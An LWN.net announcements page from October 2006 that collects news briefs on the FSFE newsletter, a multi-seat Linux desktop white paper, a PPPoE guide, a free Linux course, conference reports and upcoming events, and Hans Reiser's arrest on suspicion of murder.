Resources FSFE NewsletterThe October 5, 2006 edition of the Free Software Foundation Europe Newsletter is online. Topics include: Regional and international Fellowship meetings, FSFE at the Wizards of OS in Berlin, Georg Greve at SERCI workshop in Helsinki, Finland, FSFE at WIPO General Assembly and Other public appearances.
Multiplied Linux Desktop Migration Strategy for Novell SLED 10 and openSUSE 10.1Omni Technology Solutions has made available a white paper on the advantages of using SUSE SLED 10 and openSUSE 10.1 with the Linux Desktop Multiplier to multiple desktops. "Modern PCs spend most of the day idle. The Multiplied Linux Desktop strategy allows you to leverage this unused computing power and connect up to 10 full-featured workstations to a SINGLE, shared SLED 10 or openSUSE 10.1 computer. Ideal for Linux computer labs, Linux thin clients, Linux Internet cafes and Linux point-of-sale terminals."
Configuring PPPoEKonstantin Emelyanov of the NetUP company has put together a detailed guide (pdf) concerning installation and configuration of an open source PPPoE access server. The configuration of a PPPoE client is also covered.
Education and Certification Free Linux Course for BeginnersLinuxBasics.org has announced their second free Linux class, entitled An Introduction to Linux Basics. The course will be held online on October 19. "This course is designed to give a foundation of understanding of Linux to a beginner who wants to know a little more about the system. More advanced Linux users will find an opportunity to dig deeper into some areas they always wanted to know more about or discover gaps in their knowledge that they didn't know existed."
Event Reports The 15th Annual Embedded Systems Conference BostonCMP Technology has sent out a press release about the recent Embedded Systems Conference. "To enhance the attendee experience, CMP Technology introduced brand new programs for 2006, including the Disruption Zone which featured groundbreaking innovations from leading start-ups, those taking the next big leap forward in revolutionizing the industry. Attendees also attended "Live Teardowns" of popular electronics, like a Sony DVDirect(TM) MC1 Multi Function DVD Recorder and a Roomba vacuum, while the "Get to the Point Panel" brought the Linux technology debate right to the exhibits floor."
Boston GNOME Summit SessionsA number of session reports have been posted from the Boston GNOME summit. Topics include:
Upcoming Events Linux Installfest workshop in Davis, CAThe Linux Users' Group of Davis will hold their next free Linux Installfest on October 21, 2006 in Davis, CA.
The Open Group Announces Enterprise Architecture Practitioners Conference AgendaThe Open GroupRelated has announced the agenda for the Enterprise Architecture Practitioners Conference. The event takes place in Lisbon, Portugal on October 23-26, 2006. "The Open Group's Enterprise Architecture Practitioners Conferences, now in their third year, are globally recognized events created by and for enterprise architecture practitioners to examine a wide variety of topics which are impacting the profession. These include service-oriented architecture (SOA), agent technologies, aligning enterprise architecture with business innovation, and evolving the architecture discipline in line with business demand."
Events: October 19, 2006 to December 18, 2006The following event listing is taken from the LWN.net Calendar.
If your event does not appear here, please tell us about it. Web sites Announcing the wxBlogwxBlog is a new blog site for discussion about the wxWidgets cross-platform GUI platform.
Miscellaneous Hans Reiser arrestedFilesystem developer Hans Reiser has been arrested on suspicion of murder in the disappearance of his ex-wife. Some information can be found in this SFGate article.
Page editor: Forrest Cook
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||